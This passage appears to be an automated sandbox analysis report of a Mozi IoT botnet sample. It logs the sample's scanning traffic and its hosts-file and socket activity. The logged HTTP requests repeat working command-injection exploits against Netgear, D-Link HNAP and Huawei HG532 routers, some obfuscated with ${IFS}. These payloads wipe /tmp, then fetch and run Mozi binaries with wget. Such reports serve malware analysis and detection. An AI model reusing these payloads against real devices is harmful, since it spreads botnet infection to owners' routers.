74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 5.16.233.197:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 177.119.80.194:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 178.248.79.78:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 98.157.140.176:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 111.237.145.145:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 162.218.112.219:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: /tmp/bin.sh.elf (PID: 6244)Reads hosts file: /etc/hostsJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6261)Reads hosts file: /etc/hostsJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6265)Reads hosts file: /etc/hostsJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6257)Socket: 0.0.0.0:57285Jump to behavior
                            Source: Network trafficSuricata IDS: 2009208 - Severity 1 - ET MALWARE Possible Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 16) : 192.168.2.23:60815 -> 76.71.14.193:51412
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                            Source: unknownTCP traffic detected without corresponding DNS query: 11.190.108.117
                            Source: unknownTCP traffic detected without corresponding DNS query: 140.221.39.242
                            Source: unknownTCP traffic detected without corresponding DNS query: 178.25.78.182
                            Source: unknownTCP traffic detected without corresponding DNS query: 73.28.144.173
                            Source: unknownTCP traffic detected without corresponding DNS query: 113.94.133.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 119.215.99.156
                            Source: unknownTCP traffic detected without corresponding DNS query: 90.232.155.185
                            Source: unknownTCP traffic detected without corresponding DNS query: 111.78.196.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 26.11.196.70
                            Source: unknownTCP traffic detected without corresponding DNS query: 58.189.121.169
                            Source: unknownTCP traffic detected without corresponding DNS query: 106.152.251.50
                            Source: unknownTCP traffic detected without corresponding DNS query: 35.200.178.13
                            Source: unknownTCP traffic detected without corresponding DNS query: 137.40.92.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 18.82.236.106
                            Source: unknownTCP traffic detected without corresponding DNS query: 155.189.226.125
                            Source: unknownTCP traffic detected without corresponding DNS query: 32.54.226.30
                            Source: unknownTCP traffic detected without corresponding DNS query: 175.88.224.26
                            Source: unknownTCP traffic detected without corresponding DNS query: 7.29.11.132
                            Source: unknownTCP traffic detected without corresponding DNS query: 131.62.122.210
                            Source: unknownTCP traffic detected without corresponding DNS query: 70.172.81.219
                            Source: unknownTCP traffic detected without corresponding DNS query: 30.84.48.130
                            Source: unknownTCP traffic detected without corresponding DNS query: 171.23.177.240
                            Source: unknownTCP traffic detected without corresponding DNS query: 16.1.9.146
                            Source: unknownTCP traffic detected without corresponding DNS query: 96.204.93.246
                            Source: unknownTCP traffic detected without corresponding DNS query: 6.205.85.158
                            Source: unknownTCP traffic detected without corresponding DNS query: 122.248.149.165
                            Source: unknownTCP traffic detected without corresponding DNS query: 192.97.26.236
                            Source: unknownTCP traffic detected without corresponding DNS query: 167.233.55.65
                            Source: unknownTCP traffic detected without corresponding DNS query: 212.35.88.79
                            Source: unknownTCP traffic detected without corresponding DNS query: 25.75.205.173
                            Source: unknownTCP traffic detected without corresponding DNS query: 106.222.158.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 132.191.123.35
                            Source: unknownTCP traffic detected without corresponding DNS query: 107.227.55.144
                            Source: unknownTCP traffic detected without corresponding DNS query: 217.150.215.116
                            Source: unknownTCP traffic detected without corresponding DNS query: 137.62.189.193
                            Source: unknownTCP traffic detected without corresponding DNS query: 209.219.134.7
                            Source: unknownTCP traffic detected without corresponding DNS query: 126.106.74.156
                            Source: unknownTCP traffic detected without corresponding DNS query: 59.230.90.160
                            Source: unknownTCP traffic detected without corresponding DNS query: 179.251.32.251
                            Source: unknownTCP traffic detected without corresponding DNS query: 158.166.4.165
                            Source: unknownTCP traffic detected without corresponding DNS query: 68.228.150.77
                            Source: unknownTCP traffic detected without corresponding DNS query: 55.92.215.83
                            Source: unknownTCP traffic detected without corresponding DNS query: 153.58.49.72
                            Source: unknownTCP traffic detected without corresponding DNS query: 216.85.193.21
                            Source: unknownTCP traffic detected without corresponding DNS query: 167.15.35.246
